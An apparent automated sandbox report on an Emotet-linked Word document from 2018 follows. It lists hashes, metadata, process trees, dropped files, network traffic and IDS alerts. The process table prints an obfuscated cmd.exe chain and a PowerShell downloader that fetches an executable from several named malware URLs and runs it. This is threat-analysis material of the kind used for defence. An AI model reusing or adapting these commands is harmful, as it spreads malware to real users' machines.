File name: | be187532b8b4045bf1f4c9ae53a4154159aa7e586dc8c929c22933c900c76d62.doc |
Full analysis: | https://app.any.run/tasks/2ffb300d-65d2-49a2-948a-08a0c9a5de9b |
Verdict: | Malicious activity |
Threats: | Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime it has been upgraded into a highly destructive piece of malware. It mostly targets corporate victims, but private users are also infected through mass spam email campaigns. |
Analysis date: | November 15, 2018, 15:29:41 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | application/msword |
File info: | Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Thu Nov 15 13:55:00 2018, Last Saved Time/Date: Thu Nov 15 13:55:00 2018, Number of Pages: 1, Number of Words: 2, Number of Characters: 13, Security: 0 |
MD5: | 1B541E7D976E067F5DE93FB994FBBA3A |
SHA1: | 86E05E82384C5403ECA74582B941852CCB012742 |
SHA256: | BE187532B8B4045BF1F4C9AE53A4154159AA7E586DC8C929C22933C900C76D62 |
SSDEEP: | 1536:7wSLkFI7ocn1kp59gxBK85fBF+aBC/4bUCxRebXP:8ow41k/W48gWsLP |
.doc | | | Microsoft Word document (80) |
---|
CompObjUserType: | nHwcFQQXAwjwwKkQITiJEzEubOQQNaN |
---|---|
CompObjUserTypeLen: | 32 |
HeadingPairs: | |
TitleOfParts: | - |
HyperlinksChanged: | No |
SharedDoc: | No |
LinksUpToDate: | No |
ScaleCrop: | No |
AppVersion: | 16 |
CharCountWithSpaces: | 14 |
Paragraphs: | 1 |
Lines: | 1 |
Company: | - |
CodePage: | Windows Latin 1 (Western European) |
Security: | None |
Characters: | 13 |
Words: | 2 |
Pages: | 1 |
ModifyDate: | 2018:11:15 13:55:00 |
CreateDate: | 2018:11:15 13:55:00 |
TotalEditTime: | - |
Software: | Microsoft Office Word |
RevisionNumber: | 1 |
LastModifiedBy: | - |
Template: | Normal.dotm |
Comments: | - |
Keywords: | - |
Author: | - |
Subject: | - |
Title: | - |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
3424 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\be187532b8b4045bf1f4c9ae53a4154159aa7e586dc8c929c22933c900c76d62.doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Version: 14.0.6024.1000 | ||||
2612 | c:\GVtCJlarNiWzC\hfHWAtVQb\SibkHzN\..\..\..\windows\system32\cmd.exe /C"s^e^t ^fJ=^=N^e&&^se^t ^WY=^ &&^se^t W^2^Fb=^W&&^s^et r^o^I=^w&&s^e^t ^I6^Q^p=R&&s^e^t ^u^jV^G=^B&&^se^t cqK=^j&&^se^t ^J^t^q=^f=&&^se^t ^7^T=^p&&^set ^in=n&&^se^t ^2^5^h=^-&&s^e^t d^k^Zv=^=^ ^1^;&&^s^et k^G^s=^{&&^s^et ^bJ=/&&^s^et ^g^s=^br&&^se^t G^2=^t&&^s^et r^d^4=o^p&&^s^e^t ^7S^i=t^t&&s^e^t ^I^Ev=^0^f&&^s^et ^9m^6=^s&&s^e^t J^2=t('^@^')^;^f7f81a39-5f63-5b42-9efd-1f13b5431005amp;&^s^et cl^w^F=^.&&^s^et ^h^3lj= ^$^h&&^se^t ^D^sx=x^ml^h&&^s^e^t ^m^E^i=^o&&^s^e^t ^X^PB=^@^h&&^s^e^t ^iC^q^a=s^t&&^s^et 2^5^8^H=^u&&^s^et ^5j^e=^i&&s^e^t ^1^hT^k=N^@&&^s^e^t ^i^7^W^9=^'^h&&^s^et ^Wa^O=^s^s&&s^e^t Ir=en(&&se^t ^UZ=m^p&&^se^t ^1o=^Pa^t^h&&s^et t^3=^m&&^s^e^t O^B^s^U=(f7f81a39-5f63-5b42-9efd-1f13b5431005amp;&^s^e^t uUv=^t&&s^e^t U^D^be=^i&&^s^e^t ^g^L=^-&&s^e^t ^da^7C=^@&&se^t ^E3^u=r&&^s^e^t ^h6^g=a^o&&^s^et 5U^q^G=^m&&^se^t g^j^9=^tp&&s^e^t U^m=)&&^s^et r^9^O^1=c&&^s^e^t J^l^G=^}&&s^et C^F^O^w=^e&&s^e^t RN=y^p&&s^e^t ^h^p=^tt^p&&se^t ^FCn^m=^T'^,&&s^e^t ^4^1r=^ac&&^s^e^t ^E^S^oz=e^f^bo^o^k&&^se^t ^ba^P=r&&^s^e^t ^DPo^w=^ ^ &&^set B^8=^e^t^s^.&&^se^t ^P^L=/^At&&^s^e^t ^u^9^t=^D6&&^se^t KzXt=^d&&s^e^t ^i^H=^on^s^eB^ody)&&^s^e^t R^M=^.&&^s^e^t g^9^ty=^f7f81a39-5f63-5b42-9efd-1f13b5431005amp;&^se^t H^b^i=^an^d^.r^u&&^se^t F^g^O=^t&&^s^et ^K^i^J^X=^.&&^s^e^t G^My^4=c&&^se^t ^1^IVN=^H^,&&se^t ^mc=^a&&^se^t RP^m=^m&&^s^et ^HAf=^f7f81a39-5f63-5b42-9efd-1f13b5431005amp;&^s^e^t e^b^m^B=/v^1^9&&^s^et bynP=^-^O^b&&^s^e^t ^4i=r^o&&^s^e^t ^6^SF=^ ^ &&set ^4^ID=^j&&^se^t ^m^ZN=}c^a^tc^h&&^s^et s^PW^M=r^s&&s^e^t m^lB^s=N&&^se^t R^pn=^p&&^s^et 9^W^m^x=^ ^=^ &&se^t S^a^1^h='^;^$Lb^q&&^se^t s^B8^5='^;&&^s^e^t P^lu^b=n&&^s^et 2l^K^X=//&&s^e^t c^G=^a&&s^e^t ^f^s2e=^h&&^s^et ^G^S^J=b^q&&^se^t ^s^mN^d=^://&&^s^et ^t^eO=^l&&s^e^t ^6^hg=^de&&s^e^t ^eu=^b^q&&^se^t ^t^K^U=l&&^s^e^t c^S^D^U=(&&s^e^t M^5^KC=^w&&s^e^t ^wcv=^h^t&&^s^et ^pc^xv=^M&&s^e^t ^3l^P=^f7f81a39-5f63-5b42-9efd-1f13b5431005amp;&^s^et ^5N^Wd=^i&&^se^t 
^EL=^l^ie^.r&&set ^Pzi^4=^o&&^se^t d^5=^l2&&^s^e^t ^WG=^f&&^s^et F^W^G^2=^:&&^se^t ^FR35=^w&&^s^et R^W=p^://^e&&^se^t C^A^I=/^E&&set ^B^y^5=^;^f7f81a39-5f63-5b42-9efd-1f13b5431005amp;&^s^e^t ^f^A=o^ &&^se^t ^S^Lp=(^'&&^se^t ^S^5k=)^+'&&s^e^t ^T^G^j^f=^-c&&^s^e^t ^3t=^hR&&s^e^t ^X^h=^o&&^s^e^t J^9P^7=^ec&&^s^e^t ^T3^L=^hRj^=(&&^s^e^t ^5V^U^9=^ '&&^s^et 6^K^8=^m&&^s^et ^5o=^\&&^s^e^t s^f^B^q=^t&&^se^t p^aV^Q=^'&&^s^e^t d^6^k=^0)&&^s^et G^4^aV=^ &&^s^e^t ^D^MU=^t&&^s^e^t M^pl^f=e^a&&s^et RC7=^j&&s^e^t ^Kk^o=^o&&^se^t ^4^mK=^h^t^t&&^s^e^t ^o^J=j^@&&s^e^t ^f^d=^t^p&&s^e^t ^kX^e^q=in^ $dcf)^{^tr&&^s^e^t u^J=^a&&s^e^t 2^O=^.&&^s^e^t r^5=^ &&^s^e^t Sx^O^J=^:&&^se^t ^I^hek=e^w&&^se^t ^sQ=^o^pe&&^s^et ^s^6=^ &&^s^e^t d^Sx^9=(&&^se^t ^JzT^X=/BN&&^s^et ^Er^L^X=^X&&s^e^t S^g^T=^;&&^s^et d^l^w=^bq&&^s^et O^i^s=^s^.co&&^s^et ^mZ^pH=^u&&s^e^t 6C=^og&&^se^t P^5=^=^'^jw&&s^e^t ^E^i^y=e^ &&^s^e^t ^wJ=V&&^se^t p^oV^s=^'&&^se^t ^Hc=^e(&&s^e^t 9^x= &&^se^t ^GR^gl=^p&&^s^et M^y=^h&&^s^et r^d=^e&&^s^e^t ^Hw^A=^.e^x&&s^e^t ^b1=^G^e&&^s^e^t S^6^s=^q^.s&&^s^e^t F^5n=^y^{$^W&&s^e^t 5^WT^u=)^;&&^s^et hR^S^B=^}^ &&^s^et ^bO^2=t^ ^-c&&^s^et ^h^j^p=^j&&s^e^t ^Tn=^i^X&&^s^e^t ^wv^8=^B&&^se^t k^i^lE=^UF&&^s^et r^y=^m&&s^e^t ^6^t=^e&&^se^t ^H^g=^j&&^s^e^t ^9^XF=^.&&^s^et o^J^s=^in&&^s^et ^Br^o=.^wr^it&&^s^et I^G^L=c^e&&^s^et ^Bg=p^o&&^se^t ^i57=^O&&^s^et ^7v=^E&&^s^et ^K^mFE=^e^m.&&^s^et ^36=l^k^ino-^a^t^e&&^s^et ^t^J=^S^y&&^s^e^t ^O^T=/&&^s^et ^h^d=^f7f81a39-5f63-5b42-9efd-1f13b5431005amp;&^s^et D^L=t^o&&s^e^t ^2^h=^at&&^s^e^t wnN^p=r^e&&^s^et ^E^JP^2=^h(^$B^WH^ &&^s^et R^F=^h&&^se^t ^T^j^I=W^a&&^se^t ^i^S^U7=^e&&^s^e^t ^dcn^Z=^p^:&&^s^et j^P=^w&&s^e^t H^3^J=^h&&^se^t ^ovH^x=c&&^s^e^t ^s^2m=^G&&^se^t 2^B^H^i=p^e&&s^e^t E^g^y=^ao&&^se^t ^7z^do=^.&&s^e^t ^uVZ=^W&&s^e^t ^X^uG=^;^f^o&&^s^et ^S^kn^T= ^ &&^set T^B^e=-^P&&^set ^IO^Fz=^.^t&&s^e^t ^I^gq^Y=Wa^o&&set ^60pC=^ll&&s^e^t ^EC=^sx^m&&^s^et C^B^Hs=^h&&^s^et B^m^i=/^p&&^se^t I^s=^]:&&^s^et ^u^g^K^E=^d&&^se^t ^4^G=^e&&^s^et 
^Xf=^f7f81a39-5f63-5b42-9efd-1f13b5431005amp;&^s^et ^G8=^s^e&&^s^et tn^F^a=^av&&^s^et K^g^aU=^;S&&s^et ^F^Pu=^'^.^Sp^l&&^se^t ^P^Lc=^f7f81a39-5f63-5b42-9efd-1f13b5431005amp;&s^e^t ^U^A=^t&&s^e^t ^EC^s8=^ec&&s^e^t B^7^6=^st^o&&^s^et G^t=/&&^s^e^t R^M^38=.^a^l&&^s^et f^S^5k=^L&&^se^t t^b=^:&&s^e^t ^b^oBH=^T&&^s^et C^aU^M=^o&&^se^t 1^Q=^ &&s^e^t ^Tj^X=r^e&&s^e^t ^Xs^mo=^k&&^se^t d^p=^P&&^se^t ^T5^f^d=r&&^s^et ^SF^Ed=^;&&^s^et ^T^k^An=^b&&^s^et ^tn^E^P=^[&&s^e^t 5^y^a=res&&^s^et ^Fi^2=^o&&^s^e^t ^U1^E=^L&&s^e^t ^dN^D=^ &&^s^e^t J^6w^g=^e&&s^e^t ^b^P^J9=^L&&^s^e^t ^2F^3=^.&&^s^e^t p^K=^ado^d^b.^s^tr^eam&&^se^t X^e^bc=co^.&&^s^et f^7=)^;$^L&&^s^e^t ^4^0e^5=^l&&^s^et ^d^G^t=^il/^l&&s^e^t R^z^1^i=)^;^f7f81a39-5f63-5b42-9efd-1f13b5431005amp;&^se^t ^Jl^K=a^l&&^se^t ^Pw=re&&^s^et ^5^Q^av=^ &&^se^t T5^9^Z=^IO&&^s^e^t ^K^f=^w&&set ^9n=L^y&&^s^et e^0f^S=r&&s^e^t ^U^Y=^t&&s^et ^XU=a^b&&s^e^t ^w^tA^S=^$L^b&&s^e^t ^K^8=^f&&s^e^t ^1^hR=^ ^'&&c^a^ll ^s^et pZmI=%R^pn%%^Kk^o%%j^P%%^6^t%%s^PW^M%%M^y%%r^d%%^60pC%%1^Q%%^HAf%%^Tn%%^H^g%%P^5%%^m^E^i%%s^B8^5%%^P^Lc%%KzXt%%G^My^4%%^J^t^q%%^i^7^W^9%%^D^MU%%^U^Y%%R^W%%^t^K^U%%6C%%^9m^6%%^2F^3%%X^e^bc%%^d^G^t%%o^J^s%%^wJ%%^u^jV^G%%^I^Ev%%^o^J%%^4^mK%%^dcn^Z%%^O^T%%G^t%%^Jl^K%%^g^L%%u^J%%e^0f^S%%^XU%%^Bg%%B^8%%r^9^O^1%%^Pzi^4%%5U^q^G%%e^b^m^B%%^9n%%^u^9^t%%^da^7C%%H^3^J%%^7S^i%%^7^T%%F^W^G^2%%^bJ%%B^m^i%%^4i%%c^G%%^T5^f^d%%^ovH^x%%R^F%%^5N^Wd%%^t^eO%%H^b^i%%^JzT^X%%^1^hT^k%%^wcv%%g^j^9%%^s^mN^d%%r^o^I%%M^5^KC%%^K^f%%R^M^38%%^E^S^oz%%B^7^6%%^Tj^X%%O^i^s%%r^y%%C^A^I%%^f^s2e%%^X^PB%%^h^p%%Sx^O^J%%2l^K^X%%2^B^H^i%%^Pw%%^6^hg%%^36%%^EL%%2^5^8^H%%^P^L%%^WG%%^mZ^pH%%k^i^lE%%^F^Pu%%^5j^e%%J^2%%^T3^L%%^tn^E^P%%^t^J%%^iC^q^a%%^K^mFE%%T5^9^Z%%R^M%%^1o%%I^s%%t^b%%^b1%%G^2%%^b^oBH%%^4^G%%^UZ%%d^p%%^2^h%%C^B^Hs%%c^S^D^U%%^S^5k%%^5o%%^pc^xv%%^Er^L^X%%^b^P^J9%%^Hw^A%%C^F^O^w%%p^oV^s%%R^z^1^i%%^T^j^I%%^f^A%%^fJ%%^FR35%%bynP%%cqK%%^EC^s8%%uUv%%G^4^aV%%^T^G^j^f%%^Fi^2%%6^K^8%%^1^hR%%RP^m%%^EC%%d^5%%cl^w^F%%^D^sx%%F^g^O%%^f^d%%S^a^1^h%%9^W^m^x%%m^lB^s%%^I^hek%%^2^5^h
%%^i57%%^T^k^An%%^4^ID%%J^9P^7%%^bO^2%%C^aU^M%%t^3%%^5V^U^9%%p^K%%p^aV^Q%%^X^uG%%wnN^p%%^4^1r%%^E^JP^2%%^kX^e^q%%F^5n%%^h6^g%%2^O%%^sQ%%^in%%^S^Lp%%^s^2m%%^7v%%^FCn^m%%^h^d%%^wv^8%%W^2^Fb%%^1^IVN%%d^6^k%%^B^y^5%%^I^gq^Y%%^9^XF%%^G8%%P^lu^b%%^u^g^K^E%%d^Sx^9%%5^WT^u%%^3l^P%%f^S^5k%%^G^S^J%%^K^i^J^X%%r^d^4%%Ir%%f^7%%d^l^w%%^IO^Fz%%RN%%^E^i^y%%d^k^Zv%%^Xf%%^U1^E%%^eu%%^Br^o%%^Hc%%g^9^ty%%^uVZ%%E^g^y%%^7z^do%%5^y^a%%^GR^gl%%^i^H%%^SF^Ed%%^w^tA^S%%S^6^s%%tn^F^a%%J^6w^g%%D^L%%^K^8%%U^D^be%%^4^0e^5%%^i^S^U7%%O^B^s^U%%^3t%%^h^j^p%%U^m%%K^g^aU%%s^f^B^q%%^mc%%^ba^P%%^U^A%%T^B^e%%^E3^u%%^X^h%%I^G^L%%^Wa^O%%^h^3lj%%^I6^Q^p%%RC7%%S^g^T%%^g^s%%M^pl^f%%^Xs^mo%%^m^ZN%%k^G^s%%J^l^G%%hR^S^B%%^s^6%%r^5%%^5^Q^av%%^6^SF%%^S^kn^T%%^WY%%^DPo^w%%^dN^D%%9^x%&&ca^l^l %p^Z^mI%" | c:\windows\system32\cmd.exe | — | WINWORD.EXE |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
3216 | powershell $iXj='jwo';$dcf='http://elogs.co.il/linVB0fj@http://al-arabpoets.com/v19LyD6@http://proarchiland.ru/BNN@http://www.alefbookstores.com/Eh@http://peredelkino-atelie.ru/AtfuUF'.Split('@');$hRj=([System.IO.Path]::GetTempPath()+'\MXL.exe');$Wao =New-Object -com 'msxml2.xmlhttp';$Lbq = New-Object -com 'adodb.stream';foreach($BWH in $dcf){try{$Wao.open('GET',$BWH,0);$Wao.send();$Lbq.open();$Lbq.type = 1;$Lbq.write($Wao.responseBody);$Lbq.savetofile($hRj);Start-Process $hRj;break}catch{}} | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | cmd.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
2896 | "C:\Users\admin\AppData\Local\Temp\MXL.exe" | C:\Users\admin\AppData\Local\Temp\MXL.exe | — | powershell.exe |
User: admin Company: General Electric Rest Integrity Level: MEDIUM Description: Thissince Exit code: 0 Version: 5.4.38.36 | ||||
2696 | "C:\Users\admin\AppData\Local\Temp\MXL.exe" | C:\Users\admin\AppData\Local\Temp\MXL.exe | MXL.exe | |
User: admin Company: General Electric Rest Integrity Level: MEDIUM Description: Thissince Exit code: 0 Version: 5.4.38.36 | ||||
2868 | "C:\Users\admin\AppData\Local\Microsoft\Windows\lpiograd.exe" | C:\Users\admin\AppData\Local\Microsoft\Windows\lpiograd.exe | MXL.exe | |
User: admin Company: General Electric Rest Integrity Level: MEDIUM Description: Thissince Version: 5.4.38.36 | ||||
3408 | "C:\Users\admin\AppData\Local\Microsoft\Windows\lpiograd.exe" | C:\Users\admin\AppData\Local\Microsoft\Windows\lpiograd.exe | — | lpiograd.exe |
User: admin Company: General Electric Rest Integrity Level: MEDIUM Description: Thissince Version: 5.4.38.36 |
PID | Process | Filename | Type | |
---|---|---|---|---|
3424 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVR9201.tmp.cvr | — | |
MD5:— | SHA256:— | |||
3216 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\GZRIQEVKSA18MJLJHO4D.temp | — | |
MD5:— | SHA256:— | |||
3216 | powershell.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\RB73MZ6Y\947[1].exe | — | |
MD5:— | SHA256:— | |||
3424 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\~$187532b8b4045bf1f4c9ae53a4154159aa7e586dc8c929c22933c900c76d62.doc | pgc | |
MD5:BCA9AEA32113681E4187AA41E2D64816 | SHA256:3CACDFF3F1DA160541F802CBA8AB7B388895157EA6CD1B53469DA252F8F134CD | |||
3216 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | |
MD5:43B01A05BB940A9D5D0BE924AB203E0A | SHA256:B9E77DF43925FFAABEEDF95F08B40DD80A8E633D77929AB4F6AD45146332304B | |||
3216 | powershell.exe | C:\Users\admin\AppData\Local\Temp\MXL.exe | executable | |
MD5:0B0DC2B2CCD4B46B3381508F7209A582 | SHA256:66AE33003289D8C6C3DC7C45C1B01110B4820281061292AC076B1783700A1F2D | |||
2696 | MXL.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\lpiograd.exe | executable | |
MD5:0B0DC2B2CCD4B46B3381508F7209A582 | SHA256:66AE33003289D8C6C3DC7C45C1B01110B4820281061292AC076B1783700A1F2D | |||
3424 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm | pgc | |
MD5:701B0C0CD1B98BE223099FC32CC074FB | SHA256:27D2AD4E94C4E205170B2E1BC9BF9FA10A0E02980BC9D08726A1135CABF3D4B2 | |||
3216 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF109c32.TMP | binary | |
MD5:43B01A05BB940A9D5D0BE924AB203E0A | SHA256:B9E77DF43925FFAABEEDF95F08B40DD80A8E633D77929AB4F6AD45146332304B | |||
3216 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\IETldCache\index.dat | dat | |
MD5:D7A950FEFD60DBAA01DF2D85FEFB3862 | SHA256:75D0B1743F61B76A35B1FEDD32378837805DE58D79FA950CB6E8164BFA72073A |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
3216 | powershell.exe | GET | 301 | 193.25.100.133:80 | http://elogs.co.il/linVB0fj | DE | html | 236 b | malicious |
3216 | powershell.exe | GET | 200 | 193.25.100.133:80 | http://elogs.co.il/linVB0fj/ | DE | executable | 162 Kb | malicious |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
3216 | powershell.exe | 193.25.100.133:80 | elogs.co.il | Hoffrath & Janssen GbR | DE | suspicious |
Domain | IP | Reputation |
---|---|---|
elogs.co.il | | malicious |
PID | Process | Class | Message |
---|---|---|---|
3216 | powershell.exe | A Network Trojan was detected | ET POLICY Terse Named Filename EXE Download - Possibly Hostile |
3216 | powershell.exe | Potential Corporate Privacy Violation | ET POLICY PE EXE or DLL Windows file download HTTP |
3216 | powershell.exe | A Network Trojan was detected | ET CURRENT_EVENTS Likely Evil EXE download from MSXMLHTTP non-exe extension M2 |
3216 | powershell.exe | A Network Trojan was detected | ET TROJAN VBScript Redirect Style Exe File Download |
3216 | powershell.exe | Misc activity | ET INFO EXE - Served Attached HTTP |